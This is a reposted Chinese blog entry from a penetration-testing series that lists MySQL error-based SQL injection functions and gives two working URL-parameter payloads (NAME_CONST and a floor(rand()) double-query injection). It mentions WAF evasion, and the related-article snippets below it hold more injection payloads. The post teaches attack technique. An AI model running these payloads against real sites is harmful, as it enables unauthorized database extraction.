别人的渗透测试(三)--SQL显错注入

最新推荐文章于 2021-09-04 15:47:46 发布
最新推荐文章于 2021-09-04 15:47:46 发布
阅读量154 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/MiWhite/p/6931075.html
版权

续上一章。

安全狗拦下7成的人,过狗是门学问,偷笑.jpg。很感谢和https://home.cnblogs.com/u/xishaonian/ 博主能一起研究过狗。

说多了,言归正传SQL注入大显错。只适用MYSQL,其它数据库没学呢...

1、count,rand,floor

2、updatexml()【最大长度限制32位】

3、extractvalue()【最大长度限制32位】

4、geometrycollection()

5、multipoint()

6、polygon()

7、multipolygon()

8、linestring()

9、multilinestring()

10、exp()

11、NAME_CONST(适用于低版本)

 

?id=3&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

 

12、Error based Double Query Injection

id=99+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

13、以后再添加

2和3只能返回32位长度,如果想再多返回字符串,请使用分页或者截取字符串。/偷笑

前十个博客中如下:

 

http://www.cnblogs.com/MiWhite/p/6384711.html
http://www.cnblogs.com/MiWhite/p/6254336.html
http://www.cnblogs.com/MiWhite/p/6241265.html

 

SQL注入的方式好多,待老夫慢慢总结,莫着急。

各位拜拜~下章见。

 

转载于:https://www.cnblogs.com/MiWhite/p/6931075.html

weixin_33800463
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网站渗透测试sql注入攻击防护介绍
网站安全资讯
11-25 322
几年前,SQL注入在世界范围内很流行,但现在,SQL注入仍然是最流行的攻击方法之一,开发人员为此头疼。当然主要是因为注入攻击的灵活性,一个目的,多条语句,多种编写方法...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
显错注入——漏洞记录
chick11的博客
07-07 95
sql注入漏洞测试(报错注入) 访问靶场,又看到通知栏的滚动条 查看url ?id=1 是不是很惊喜。这个东西get传参。 直接在url中操作:’ , ‘ and 1=1 或者 ’and 1=2 注意可以加上--+注释 看一下字段数 order by 5 的时候出现页面报错 说明四个字段,尝试union select 系统过滤了我们输入的union。 怎么办,考虑绕过过滤:大小写,字符串编码 大小写混用,绕过过滤。并获得显错位置 接下来就是常规操作 id=-1
初级开发者经常忽视的问题——SQL注入攻击
weixin_45303938的博客
09-16 197
一般来讲,刚入行的开发者容易忽视这个问题,随着经验的累积和良好开发习惯的养成,成熟的开发工程师写的代码里很少会有SQL注入攻击的错误。 概念及原理 SQL注入攻击是一种比较常见的攻击方式,其原理也比较简单:就是利用系统在执行数据库操作的环节,通过构造出特定参数,改变执行数据库操作SQL语句的逻辑和功能,达到攻击的目的。举个最简单也最容易理解的例子,如登录系统时,在后台做用户口令的验证这样写: "select id from users where username = ‘"+USERNAME +"’ and
SQL注入之mysql显错注入
weixin_34060741的博客
11-12 857
在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你...
显错sql注入练习
D_Dwjh的博客
08-04 186
sql注入rank2 这里的id是个单引号的字符串,所以要注意,要先把单引号闭合,不然输的东西都变成字符串,我们应该让他变成执行的代码语句。最后还需要把多余的单引号注释掉,不能忘记哦~ 输入: ’ and 1=1 – q 输入: ’ and 1=2 – q 发现当成输入语句当成代码来执行了,说明存在sql注入,这里上面url发现是看不懂的编码,可以利用在线url编码工具,进行解码,如下图所示: 然后继续回归正题,发现存在注入点后,开始分析这个注入点存在的字段数 输入: ’ and 1=1 orde
35-35.渗透测试SQL注入SQL注入防御
最新发布
05-10
35-35.渗透测试SQL注入SQL注入防御
31-31.渗透测试SQL注入盲注
05-10
渗透测试SQL注入盲注
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
GET和POST的区别
weixin_30645617的博客
08-28 134
1.GET把参数包含在URL中,POST通过request body传递参数。 2.GET在浏览器回退时是无害的,而POST会再次提交请求。 3.GET产生的URL地址可以被Bookmark,而POST不可以。 4.GET请求会被浏览器主动cache,而POST不会,除非手动设置。 5.GET请求只能进行url编码,而POST支持多种编码方式。 6.GET...
十种MYSQL显错注入原理讲解(二)
weixin_38023368的博客
09-04 384
1、geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); 函数讲解:   GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。对GeometryCollection的元素无任何限制,但下
报错注入的原理分析
m0_38103658的博客
08-30 5112
报错注入的原理分析 SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用。 使用报错注入的前提: 页面上没有显示位但是有sql语句执行错误信息输出位。 使用mysql_error()函数,可以返回上一个Mysql操作产生的文本错误信息。 MYSQL报错注入的分类: BIGINT等数据类型溢出 xpat...
一次简单的纯手工显错注入
qq_42097777的博客
03-29 597
# 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 **注:这里还要利用到了一个函数group_concat( ),意思是将查询的结果并排 拼接一起展示,不然输出点只能显示一个表名或者字段 1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有注入点 2。order by 语句查询有几个字段,为了后面使用联合查询 例如,order by 4 出错,...
渗透之路进阶 -- SQL注入进阶(盲注和报错注入
r0cky的博客
09-18 573
SQL注入之盲注 实战过程中,大多情况下很少会有回显,这个时候就要去使用盲注技术 盲注,Blind SQL Injection,听这名字就感觉整个过程就是一个盲目的过程 当注入时,没有任何提示的时候,就改用上盲注 常见函数 ascii(str) str是一个字符串参数,返回值为其最左侧字符的ascii码。通过它,我们才能确定特定的字符。 substr(str,start,len) 这个函数是...
地理空间数据Geometry在MySQL中使用(一)
热门推荐
日进一步
12-18 2万+
在MySQL中,Geometry等几何对象可以用来表示地理位置,即用几何对象表示地理空间数据。 在MySQL中支持的几何数据类型包括Geometry、Point、LineString、Polygon以及集合类型的MultiPoint、MultiLineString、MultiPolygon、GeometryCollection。其中Geometry可以表示任意一种几何类型,即在MySQL中,如果...
网络安全从入门到精通(第四章-2)GET&POST&HEAD注入
weixin_43643758的博客
03-29 487
本文内容: GET注入 POST注入 Head注入 sqlmap工具注入 get&post为显错注入: head为报错注入: 1,GET注入:   get注入属于显错注入。     1.判断注入点:       最古老的的方法是:         http://www.xxx.com/new.php?id=1 and 1=1 页面显示正常。         http:...
SQL注入显错注入
秋水的博客
08-30 3690
MySQL基础知识 系统自带库information_schema中存在tables表和columns表,我们可以通过这两个表查询相关信息 distinct关键字,distinct用于去除查询中的重复,可以用information_schema.tables中的TABLE_SCHEMA字段查询出所有库信息 group_concat()函数,此函数只有MySQL中存在,作用是把查询出的内容通...
渗透测试必备:数据库常见表名与SQL注入防范
在进行渗透测试时,特别是针对SQL注入和Cookie注入等安全漏洞检查,了解数据库中的常见表名至关重要。这些表名反映了数据库设计的基本结构,攻击者可能会利用它们来构造恶意查询。以下是一些常见的数据库表名及其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值